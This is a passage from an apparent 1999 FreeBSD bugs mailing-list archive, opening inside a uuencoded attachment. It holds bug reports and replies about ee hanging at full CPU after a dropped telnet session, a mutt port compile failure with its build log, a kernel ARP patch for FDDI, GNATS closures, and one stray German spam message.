MFJ1SM6<8_KI/,_;4U4RG&I/0?JD<9N87$@=@QD+'DS`^5TFLKI,B)8.DRXH8 MNJ'1L3_7*IE2_<8G,Z@GW="(2K<;GD79`;AV'.9S?Z'P3,,L)QNFX-AL!MY+ M+S).GJTH.0\#/P+[=-:&>9J@+\)DDJU$/^DTR=J6ARX6W^"PI?EJ+%\`(>.M M7CY9GF"8@Q7X,0EX7#^VK&_64[EG6*O1F&`\)?L[`O6`_A:<) M3?2&_%IG]#S<&QU"5'X]`X^%'(TO=+J0R)A?ER3TNK]E[=YS6[WG=C*._%GY M]_A=O$!R,H=Y5T))K#5^^D'`JI'=++;Z6?VKA$TZ*-!D@)"@'`+7^"*%J3^; MA!)6-8',09(=[>.[KA0KZBK,9Q*\_B4`!J`&CB2U<"E%27)!W^A@\$=AC`O' MA^GQKS/R(,0ZS?`R6#L*#(KI"[7XG):9A=.,7!C#/+L:ICK4M$"!'OB0W4_3 MY`I">YQZVL5P`3P$MFG'Q(GB<[PZQAQ&)TN_K)($[-4!@=>8]1!)_I",`LA*4`V M!`_`"65LT31=>@4=HLB$O1^+)->'47BA]Y;J8"@X!#)CV1!.,0A4@10#Q=(#+-T%481?J,'9DR+B()&OH?$"DSBM,@+,CW2&'7@@$]2K7__ MU<<'EK7V*>;)(KG2:5:DY_IWN0YF<8+7@RSO@.F/?[5;V%W9E5W9E5UY@_)? (^1:7P`!0``#) ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 8:49:55 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from UTMJB.UTM.MY (utmjb.utm.my [161.139.16.1]) by hub.freebsd.org (Postfix) with SMTP id 563AF14C0F for ; Sat, 11 Sep 1999 08:49:52 -0700 (PDT) (envelope-from @UTMJB.UTM.MY:cbchai@pl.jaring.my) Received: from ChungBin by UTMJB.UTM.MY (IBM VM SMTP V2R2) with TCP; Sat, 11 Sep 99 23:48:19 MAL Message-ID: <37DB3F52.2C01@pl.jaring.my> Date: Sat, 11 Sep 1999 23:51:14 -0600 From: CHUNG BIN X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.ORG Cc: cbchai@rocketmail.com Subject: Is this an ee bug Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear genius, Currently using FreeBSD 3.0R RELEASE.Would like to inquire if this is a bug. Telnet into the system from a Windows95/98 system, invoke editor "ee" that comes with FreeBSD, then terminate the telnet session without escaping or exitting ee and logout. Found out that the ee process would not be terminted, instead the CPU consumption for ee increase exponentially from few percent to 99.9% causing the CPU to get overheat of extreme load. The telnet session could be terminated either intentionally or not. If not intentionnally, it might be that a sudden electricity black out occur, or that the user unintentionally terminated the session, just like what a user of my FreeBSD powered system did.If it is intentioned, I suppose this bug could pose a threat to the system in that it can be used as a DOS, overheating the CPU and bring the system down. Hope ya can confirm this condition. May all be well and happy Chung Bin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 11:20:54 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from server6000.net (server6000.net [209.239.58.95]) by hub.freebsd.org (Postfix) with ESMTP id 9DD8A14D32 for ; Sat, 11 Sep 1999 11:20:51 -0700 (PDT) (envelope-from picasso-request@winsen.net) Received: (from winnet@localhost) by server6000.net (8.9.3/8.9.3) id OAA11464; Sat, 11 Sep 1999 14:20:05 -0400 X-Authentication-Warning: server6000.net: winnet set sender to picasso-request@winsen.net using -f Message-Id: <199909111804.LAA20242@harrier.prod.itd.earthlink.net> From: "J. Halle" To: Picasso@winsen.net Date: Sat, 11 Sep 1999 11:04:02 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=ISO-8859-1 Subject: RE: Kunst Reply-To: jh@winsen.net X-mailer: Pegasus Mail for Win32 (v3.11) Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from Quoted-printable to 8bit by server6000.net id OAA05338 X-Mailing-List: archive/latest/7 X-Loop: picasso@winsen.net Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Als Dankeschön für Ihre Zeit an dieser Email, bieten wir Ihnen exklusiv die Möglichkeit sich für DM 15,95.- im Internet mit eigener Top-Level Domain (IhrName.de) zu präsentieren. http://www.winsen.net/angebot.html +++++++++ Diese Mailingliste dient zur Umfrage von Kunst verwandten Themen. Emailen Sie bitte cancel@winsen.net um von dieser Liste entfernt zu werden. +++++++++ Als Provider hätten wir gerne gewusst ob Sie Interesse hätte kostenlos an einem Online Kunst Markt teilzunehmen. Dieser Markt würde unter der Domain KunstAnkauf.de im Internet erscheinen. - Wäre so etwas von Interesse? Was halten Sie von der Webseite FroheOstern.com (http://www.FroheOstern.com) – ein kostenloser e-Karten Versandt. Wir würden gerne lokale Künstler und deren Kunst in diese Webseite integrieren (selbstverständlich kostenlos). - Haben Sie Kontakt zu Künstlern, die Interesse haben? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 11:29:28 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mta3.rcsntx.swbell.net (mta3.rcsntx.swbell.net [151.164.30.27]) by hub.freebsd.org (Postfix) with ESMTP id 4E80114D32 for ; Sat, 11 Sep 1999 11:29:26 -0700 (PDT) (envelope-from chris@holly.dyndns.org) Received: from holly.dyndns.org (adsl-216-62-157-60.dsl.hstntx.swbell.net) by mta3.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.1999.05.24.18.28.p7) with ESMTP id <0FHW00COJRAS1M@mta3.rcsntx.swbell.net> for freebsd-bugs@FreeBSD.ORG; Sat, 11 Sep 1999 13:29:25 -0500 (CDT) Received: (from chris@localhost) by holly.dyndns.org (8.9.3/8.9.3) id NAA08819; Sat, 11 Sep 1999 13:28:04 -0500 (CDT envelope-from chris) Date: Sat, 11 Sep 1999 13:28:04 -0500 From: Chris Costello Subject: Re: port /usr/ports/mail/mutt doesn't compile In-reply-to: <199909111449.JAA21956@cs.rice.edu> To: Mohit Aron Cc: freebsd-bugs@FreeBSD.ORG Reply-To: chris@calldei.com Message-id: <19990911132804.L906@holly.dyndns.org> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.6i References: <199909111449.JAA21956@cs.rice.edu> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Sep 11, 1999, Mohit Aron wrote: > Hi, > I tried installing mutt on my FreeBSD-3.2 machine by typing a > make in /usr/ports/mail/mutt. Unfortunately, the compilation was terminated > after several errors. Also I couldn't find a package for mutt in the FreeBSD > package collection. Can mutt be made available for FreeBSD users. Thanks, What are the errors you get? For future reference, please include the errors and use send-pr to report bugs! We, as developers, cannot yet easily read your mind! -- |Chris Costello |One picture is worth 128K words. `---------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 11:32:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from TFrost.PMCNet.net (TFrost.cch.pmc.ru [195.208.204.140]) by hub.freebsd.org (Postfix) with ESMTP id 547A514D32; Sat, 11 Sep 1999 11:32:41 -0700 (PDT) (envelope-from dl@antigona.PMCNet.net) Received: from antigona.PMCNet.net (antigona.PMCNet.net [195.208.204.66]) by TFrost.PMCNet.net (8.9.3/8.9.3) with ESMTP id WAA00803; Sat, 11 Sep 1999 22:32:51 +0400 (MSD) (envelope-from dl@antigona.PMCNet.net) Received: (from dl@localhost) by antigona.PMCNet.net (8.9.3/8.9.3) id WAA14936; Sat, 11 Sep 1999 22:32:35 +0400 (MSD) (envelope-from dl) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="_=XFMail.1.3.p0.FreeBSD:990911223235:34164=_" Date: Sat, 11 Sep 1999 22:32:35 +0400 (MSD) Organization: General Research Computer Centre of President's Medical Centre From: Dron Link To: freebsd-bugs@FreeBSD.ORG Subject: ARP FDDI Trouble + PATCH Cc: dg@FreeBSD.ORG, wollman@FreeBSD.ORG, peter@FreeBSD.ORG Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format --_=XFMail.1.3.p0.FreeBSD:990911223235:34164=_ Content-Type: text/plain; charset=KOI8-R Hi Machine: Pent120+64+DFEA(Dual)+... Trouble: 2.2.1 -> 3.2 (4.0) = ARP on FDDI not work. Any ARP (0806) packets not send & not received. (tcpdump -i fea0 -x -e -n arp) Solve: 1) Static ARP for any host :-( 2) Edit Kernel source Problem with /usr/src/sys/netinet/if_ether.c For FDDI - ac->ac_if.if_type=IFT_FDDI => Patch See you...... -- 11-Sep-99 22:11:51 System Administrator Andrey M Linkevitch Department of Networks Technologies & Communications --_=XFMail.1.3.p0.FreeBSD:990911223235:34164=_ Content-Disposition: attachment; filename="sys.patch" Content-Transfer-Encoding: none Content-Description: sys.patch Content-Type: text/plain; charset=KOI8-R; name=sys.patch; SizeOnDisk=662 diff -u -r sys.orig/netinet/if_ether.c sys/netinet/if_ether.c --- sys.orig/netinet/if_ether.c Thu May 27 07:06:47 1999 +++ sys/netinet/if_ether.c Sat Sep 11 22:04:12 1999 @@ -292,6 +292,7 @@ return; m->m_pkthdr.rcvif = (struct ifnet *)0; switch (ac->ac_if.if_type) { + case IFT_FDDI: case IFT_ETHER: m->m_len = sizeof(*ea); m->m_pkthdr.len = sizeof(*ea); @@ -665,6 +666,7 @@ sa.sa_data[(sizeof(th->iso88025_dhost) * 2)] = 0x10; sa.sa_data[(sizeof(th->iso88025_dhost) * 2) + 1] = 0x40; break; + case IFT_FDDI: case IFT_ETHER: eh = (struct ether_header *)sa.sa_data; (void)memcpy(eh->ether_dhost, ea->arp_tha, sizeof(eh->ether_dhost)); --_=XFMail.1.3.p0.FreeBSD:990911223235:34164=_-- End of MIME message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 11:35:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 46C1015271; Sat, 11 Sep 1999 11:34:43 -0700 (PDT) (envelope-from chris@FreeBSD.org) Received: (from chris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA02346; Sat, 11 Sep 1999 11:34:43 -0700 (PDT) (envelope-from chris@FreeBSD.org) Date: Sat, 11 Sep 1999 11:34:43 -0700 (PDT) From: Message-Id: <199909111834.LAA02346@freefall.freebsd.org> To: monroyj@hotmail.com, chris@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/13697: pstat(8) command line option '-w' not functional Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: pstat(8) command line option '-w' not functional State-Changed-From-To: open->closed State-Changed-By: chris State-Changed-When: Sat Sep 11 11:33:49 PDT 1999 State-Changed-Why: There is no evidence of such flag in a man page or the code. If such an option once existed at 3.1-RELEASE, it has been removed. Removal of such an option will not retroactively apply to an already-installed release. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 13:10:21 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from cs.rice.edu (cs.rice.edu [128.42.1.30]) by hub.freebsd.org (Postfix) with ESMTP id C10FC14C29 for ; Sat, 11 Sep 1999 13:10:14 -0700 (PDT) (envelope-from aron@cs.rice.edu) Received: (from aron@localhost) by cs.rice.edu (8.9.0/8.9.0) id PAA25463; Sat, 11 Sep 1999 15:10:00 -0500 (CDT) From: Mohit Aron Message-Id: <199909112010.PAA25463@cs.rice.edu> Subject: Re: port /usr/ports/mail/mutt doesn't compile To: chris@calldei.com Date: Sat, 11 Sep 1999 15:10:00 -0500 (CDT) Cc: freebsd-bugs@freebsd.org In-Reply-To: <19990911132804.L906@holly.dyndns.org> from "Chris Costello" at Sep 11, 99 01:28:04 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Hi, > > I tried installing mutt on my FreeBSD-3.2 machine by typing a > > make in /usr/ports/mail/mutt. Unfortunately, the compilation was terminated > > after several errors. Also I couldn't find a package for mutt in the FreeBSD > > package collection. Can mutt be made available for FreeBSD users. Thanks, > > What are the errors you get? > > For future reference, please include the errors and use > send-pr to report bugs! We, as developers, cannot yet easily > read your mind! > I'm sorry, I thought you can figure out the problem yourself by simply trying to do a 'make' in /usr/ports/mail/mutt. Anyway, I'm attaching below the output resulting from the make command (using script). Here's an output of 'uname -a' on my machine: FreeBSD luzern.cs.rice.edu 3.2-RELEASE FreeBSD 3.2-RELEASE #1: Tue Aug 17 13:47:56 CDT 1999 aron@luzern.cs.rice.edu:/usr/src/sys/compile/LUZERN i386 - Mohit Script started on Sat Sep 11 15:02:50 1999 luzern:mutt>make ===> Extracting for mutt-0.95.4 >> Checksum OK for mutt/mutt-0.95.4i.tar.gz. ===> Patching for mutt-0.95.4 ===> Applying distribution patches for mutt-0.95.4 ===> Applying FreeBSD patches for mutt-0.95.4 uudecode -p /usr/ports/mail/mutt/files/ru.gmo.uu > /usr/ports/mail/mutt/work/mutt-0.95.4/po/ru.gmo ===> Configuring for mutt-0.95.4 creating cache ./config.cache checking for a BSD compatible install... /usr/bin/install -c -o root -g wheel checking whether build environment is sane... yes checking whether make sets ${MAKE}... yes checking for working aclocal... found checking for working autoconf... found checking for working automake... found checking for working autoheader... found checking for working makeinfo... found checking host system type... i386--freebsd3.2 checking for prefix... /usr/local checking for gcc... gcc checking whether the C compiler (gcc -O -pipe ) works... yes checking whether the C compiler (gcc -O -pipe ) is a cross-compiler... no checking whether we are using GNU C... yes checking whether gcc accepts -g... yes checking whether make sets ${MAKE}... (cached) yes checking for a BSD compatible install... /usr/bin/install -c -o root -g wheel checking for POSIXized ISC... no checking for sendmail... /usr/sbin/sendmail checking for gpg... no checking for pgpk... no checking for pgp... no checking for ispell... /usr/local/bin/ispell checking how to run the C preprocessor... gcc -E checking for initscr in -lncurses... yes checking for ncurses.h... yes checking for start_color... yes checking for typeahead... yes checking for bkgdset... yes checking for curs_set... yes checking for meta... yes checking for use_default_colors... no checking for resizeterm... yes checking for ANSI C header files... no checking for stdarg.h... yes checking for sys/ioctl.h... yes checking for sysexits.h... yes checking for getopt.h... no checking return type of signal handlers... void checking for sys_siglist declaration in signal.h or unistd.h... yes checking size of long... 4 checking for pid_t... yes checking for setegid... yes checking for srand48... yes checking for strerror... yes checking for strcasecmp... yes checking for snprintf... yes checking for vsnprintf... yes checking for ftruncate... yes checking for strftime... yes checking for fchdir... yes checking for regcomp... yes checking whether your system's regexp library is completely broken... no checking where new mail is stored... /var/mail checking if /var/mail is world writable... no checking if /var/mail is group writable... yes checking where to put architecture-dependent files... /usr/local/lib/mutt checking for socket in -lsocket... no checking for gethostbyname in -lnsl... no checking for socket in -lsocket... (cached) no checking for gethostbyname in -lnsl... (cached) no checking for ranlib... ranlib checking for working const... yes checking for inline... inline checking for off_t... yes checking for size_t... yes checking for working alloca.h... no checking for alloca... yes checking for unistd.h... yes checking for getpagesize... yes checking for working mmap... yes checking for argz.h... no checking for limits.h... yes checking for locale.h... yes checking for nl_types.h... yes checking for malloc.h... no checking for string.h... yes checking for unistd.h... (cached) yes checking for sys/param.h... yes checking for getcwd... yes checking for munmap... yes checking for putenv... yes checking for setenv... yes checking for setlocale... yes checking for strchr... yes checking for strcasecmp... (cached) yes checking for strdup... yes checking for __argz_count... no checking for __argz_stringify... no checking for __argz_next... no checking for stpcpy... no checking for LC_MESSAGES... yes checking whether NLS is requested... yes checking whether included gettext is requested... no checking for libintl.h... no checking whether catgets can be used... no checking for msgfmt... /usr/local/bin/msgfmt checking for gmsgfmt... /usr/local/bin/msgfmt checking for xgettext... /usr/local/bin/xgettext checking for catalogs to be installed... de ru it es uk fr pl nl cs updating cache ./config.cache creating ./config.status creating Makefile creating intl/Makefile creating m4/Makefile creating po/Makefile.in creating Muttrc creating doc/Makefile creating doc/manual.sgml creating doc/dotlock.man creating doc/mutt.man creating charsets/Makefile creating contrib/Makefile creating config.h linking ./intl/libgettext.h to intl/libintl.h ===> Building for mutt-0.95.4 make all-recursive Making all in doc make html sgmlfmt -f html manual sgmlfmt: not found *** Error code 1 Stop. *** Error code 1 (ignored) make manual.txt sgml2txt -c latin manual sgml2txt: not found *** Error code 1 Stop. *** Error code 1 (ignored) make manual.latin1 sgmlfmt -f latin1 manual.sgml sgmlfmt: not found *** Error code 1 Stop. *** Error code 1 (ignored) Making all in intl gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe intl-compat.c gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe bindtextdom.c In file included from bindtextdom.c:48: gettextP.h:50: warning: ANSI does not permit the keyword `inline' bindtextdom.c: In function `bindtextdomain__': bindtextdom.c:143: warning: implicit declaration of function `malloc' gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe dcgettext.c In file included from dcgettext.c:80: gettextP.h:50: warning: ANSI does not permit the keyword `inline' In file included from dcgettext.c:86: hash-string.h:39: warning: ANSI does not permit the keyword `inline' gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe dgettext.c gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe gettext.c gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe finddomain.c In file included from finddomain.c:58: gettextP.h:50: warning: ANSI does not permit the keyword `inline' gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe loadmsgcat.c In file included from loadmsgcat.c:40: gettextP.h:50: warning: ANSI does not permit the keyword `inline' loadmsgcat.c: In function `_nl_load_domain': loadmsgcat.c:125: warning: implicit declaration of function `malloc' loadmsgcat.c:159: warning: implicit declaration of function `free' gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe localealias.c In file included from localealias.c:74: gettextP.h:50: warning: ANSI does not permit the keyword `inline' localealias.c: In function `_nl_expand_alias': localealias.c:173: warning: implicit declaration of function `bsearch' localealias.c: In function `read_alias_file': localealias.c:259: warning: pointer targets in passing arg 1 of `fgets' differ in signedness localealias.c:265: warning: pointer targets in passing arg 1 of `strchr' differ in signedness localealias.c:318: warning: pointer targets in passing arg 1 of `strlen' differ in signedness localealias.c:319: warning: pointer targets in passing arg 1 of `strlen' differ in signedness localealias.c:327: warning: implicit declaration of function `realloc' localealias.c:356: warning: implicit declaration of function `qsort' gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe textdomain.c textdomain.c: In function `textdomain__': textdomain.c:101: warning: implicit declaration of function `free' gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe l10nflist.c l10nflist.c:158: warning: ANSI does not permit the keyword `inline' l10nflist.c: In function `_nl_make_l10nflist': l10nflist.c:199: warning: implicit declaration of function `malloc' l10nflist.c:297: warning: implicit declaration of function `free' gcc -c -DLOCALEDIR=\"/usr/local/share/locale\" -DGNULOCALEDIR=\"/usr/local/share/locale\" -DLOCALE_ALIAS_PATH=\"/usr/local/share/locale:.\" -DHAVE_CONFIG_H -I.. -I. -I../intl -I../lib -DDL_STANDALONE -DDOTLOCK="\"/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe explodename.c explodename.c: In function `_nl_explode_name': explodename.c:113: warning: pointer targets in passing arg 1 of `_nl_normalize_codeset' differ in signedness explodename.c:115: warning: implicit declaration of function `free' rm -f libintl.a ar cru libintl.a intl-compat.o bindtextdom.o dcgettext.o dgettext.o gettext.o finddomain.o loadmsgcat.o localealias.o textdomain.o l10nflist.o explodename.o ranlib libintl.a Making all in m4 Making all in po Making all in contrib Making all in charsets gcc -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe -D_GEN_CHARSETS -c parse_i18n.c gcc -o parse_i18n parse_i18n.o cd . && sh ./gen_charsets ./gen_defs ./OPS ./OPS.PGP > keymap_defs.h gcc -DSHAREDIR=\"/usr/local/share/mutt\" -DSYSCONFDIR=\"/usr/local/etc\" -DHAVE_CONFIG_H=1 -I. -I/usr/local/include -DDL_STANDALONE -DDOTLOCK="\"/usr/local/bin/mutt_dotlock\"" -I./intl -DHAVE_CONFIG_H=1 -Wall -pedantic -O -pipe -c addrbook.c In file included from mutt.h:685, from addrbook.c:19: protos.h:394: conflicting types for `fprintf' protos.h:394: A parameter list with an ellipsis can't match protos.h:394: an empty parameter name list declaration. /usr/include/stdio.h:210: previous declaration of `fprintf' protos.h:395: conflicting types for `printf' protos.h:395: A parameter list with an ellipsis can't match protos.h:395: an empty parameter name list declaration. /usr/include/stdio.h:228: previous declaration of `printf' protos.h:399: conflicting types for `sscanf' protos.h:399: A parameter list with an ellipsis can't match protos.h:399: an empty parameter name list declaration. /usr/include/stdio.h:239: previous declaration of `sscanf' *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. luzern:mutt>exit Script done on Sat Sep 11 15:04:05 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 17: 0: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9C0E714FA0 for ; Sat, 11 Sep 1999 17:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA45554; Sat, 11 Sep 1999 17:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Sat, 11 Sep 1999 17:00:01 -0700 (PDT) Message-Id: <199909120000.RAA45554@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Martin Blapp Subject: Re: bin/13692: umount(8) does not unmount filesystems with a trailing slash Reply-To: Martin Blapp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13692; it has been noted by GNATS. From: Martin Blapp To: freebsd-gnats-submit@freebsd.org, logix@foobar.franken.de Cc: Subject: Re: bin/13692: umount(8) does not unmount filesystems with a trailing slash Date: Sat, 11 Sep 1999 23:55:44 +0000 Hi Logix, Try this patch. Most of it will be commited to FreeBSD- Current soon. All your problems should be solved then: http://www.freebsd.org/~alfred/mount.diff Cheers, Martin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 18:28:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 89A9B14DB3; Sat, 11 Sep 1999 18:28:52 -0700 (PDT) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA52571; Sat, 11 Sep 1999 18:28:52 -0700 (PDT) (envelope-from mharo@FreeBSD.org) Date: Sat, 11 Sep 1999 18:28:52 -0700 (PDT) From: Message-Id: <199909120128.SAA52571@freefall.freebsd.org> To: ian@plutotech.com, mharo@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/13261: ftpd mishandles STAT command during a file transfer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ftpd mishandles STAT command during a file transfer State-Changed-From-To: open->closed State-Changed-By: mharo State-Changed-When: Sat Sep 11 18:27:55 PDT 1999 State-Changed-Why: Fix committed. Thanks for finding this. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 19:10: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A9BF814E71 for ; Sat, 11 Sep 1999 19:10:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA55448; Sat, 11 Sep 1999 19:10:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from man-97-187.reshall.berkeley.edu (man-97-187.Reshall.Berkeley.EDU [169.229.97.187]) by hub.freebsd.org (Postfix) with ESMTP id D8B7014CF6 for ; Sat, 11 Sep 1999 19:07:48 -0700 (PDT) (envelope-from lou@man-97-187.reshall.berkeley.edu) Received: (from lou@localhost) by man-97-187.reshall.berkeley.edu (8.9.3/8.9.3) id TAA10289; Sat, 11 Sep 1999 19:04:21 -0700 (PDT) (envelope-from lou) Message-Id: <199909120204.TAA10289@man-97-187.reshall.berkeley.edu> Date: Sat, 11 Sep 1999 19:04:21 -0700 (PDT) From: lou@man-97-187.reshall.berkeley.edu Reply-To: lou@man-97-187.reshall.berkeley.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/13703: libf2c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13703 >Category: bin >Synopsis: MCNP compilation problem >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Sep 11 19:10:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Tak Pui Lou >Release: FreeBSD 3.2-RELEASE i386 >Organization: UCBNE >Environment: >Description: When I compiled MCNP, I can't get one of the subroutine working probably. This subroutine tries to read the input and write it to another file. When the input has a line begins with "like", it backspace and read the previous line again and write the previous line with some changes to the output file. But, it seems to be confuse about the file formats after that. The input is ascii. I don't know about the output but it seems to be binary but become ascii after "like" card or vice-versa. (I am not sure because it is a hugh program.) This happens to all FBSD versions I have used. There is no error message when you compile it, but the program won't run with "like" card. >How-To-Repeat: To show you 